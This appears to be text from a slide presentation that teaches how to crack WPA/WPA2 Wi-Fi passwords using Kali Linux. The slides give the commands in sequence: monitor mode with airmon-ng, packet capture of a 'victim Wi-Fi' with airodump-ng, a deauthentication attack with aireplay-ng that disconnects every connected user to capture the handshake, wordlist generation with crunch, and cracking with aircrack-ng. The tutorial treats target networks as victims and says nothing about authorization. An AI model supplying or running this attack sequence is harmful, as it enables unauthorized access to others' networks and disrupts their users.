  • 16. Kali Linux • Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd 12/18/2018ahmadyark1@gmail.com 16
  • 17. Wireless Attacks tools • Airbase-ng • Aircrack-ng • Airdecap-ng and Airdecloak-ng • Aireplay-ng • Airmon-ng • Airodump-ng • airodump-ng-oui-update • Airolib-ng • Airserv-ng • Airtun-ng • Asleap 12/18/2018 ahmadyark1@gmail.com 17
  • 18. Process • Install aVMware workstation on your Computer • Open theVMware workstation and install Kali Linux on it • After completing installation • Go toVM>Removable Device • And now connect yourWi-Fi Booster orWi-Fi Receiver on it. 12/18/2018ahmadyark1@gmail.com 18
  • 19. Penetration Of AWireless Network StartsWith Logging Into Kali • If you haven’t already login to Kali, the default login information is: root(Username) and toor (Password) 12/18/2018 ahmadyark1@gmail.com 19
  • 20. WPA Handshake? • How do hackers or remote attackers obtain the WPA or WPA2Handshake from a wireless access point easily? By launching a Wi-Fi bomb they can force all users to disconnect the access point for a few seconds. Their software will automatically reconnect and this way they sniff the connection handshake. 12/18/2018ahmadyark1@gmail.com 20
  • 21. How WIFI works? • Wi-Fi transmits signal in the form of packets in air so we need to capture all the packets in air so we use airodump to dump all the packets in air .After that we should see that if any one is connected to the victim Wi-Fi. If anyone is not connected the Wi-Fi, cracking is not possible as we need a wpa handshake. We can capture handshake by sending DE authentication packets to client connected toWi-Fi. Aircrack cracks the password. 12/18/2018ahmadyark1@gmail.com 21
  • 22. “iwconfig” command This command is need to know the name of the wireless adapter connected to the computer because computer has many adapters connected. 12/18/2018ahmadyark1@gmail.com 22
  • 24. “airmon-ng check kill” command • This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. 12/18/2018ahmadyark1@gmail.com 24
  • 26. “airmon-ng start wlan0” command • This command will enable the monitor mode on the Wi-Fi card. So while using interface in any terminal or command line use “wlan0mon”. 12/18/2018ahmadyark1@gmail.com 26
  • 28. ”airodump-ng wlanOmon” command • This will display all the access points in your surroundings and also the clients connected to that access points • All the user using this Wi-Fi router. 12/18/2018ahmadyark1@gmail.com 28
  • 30. “airodump-ng -c channel –bssid [bssid of Wi-Fi] -w [path to write the data of packets] wlan0mon[interface]” command • -bssid in my case bssid is indicated with red mark. • -c channel is the channel of victim Wi-Fi in my case it is 10(see in previous screenshot for channel number) • -w It is used to write the captured data to a specified path in my case it is ‘/root/Desktop/hack’. • Interface in my case is wlan0mon 12/18/2018ahmadyark1@gmail.com 30
  • 33. “aireplay-ng –deauth 10 -a [router bssid] interface” command •In this step we DE authenticate the connected clients to theWi-Fi •All the users connected toWi-Fi router disconnects. 12/18/2018ahmadyark1@gmail.com 33
  • 35. •After this the client tries to connect to theWi-Fi again. At that time, we will capture the packets which sends from client. From this result, we will get wpa handshake. 12/18/2018ahmadyark1@gmail.com 35
  • 38. “Crunch 8 8 1234abcd –o wordlist” command 12/18/2018ahmadyark1@gmail.com 38
  • 39. “aircrack-ng -b [bssid of router] -w [path to word list] [path to capture packets]” command 12/18/2018ahmadyark1@gmail.com 39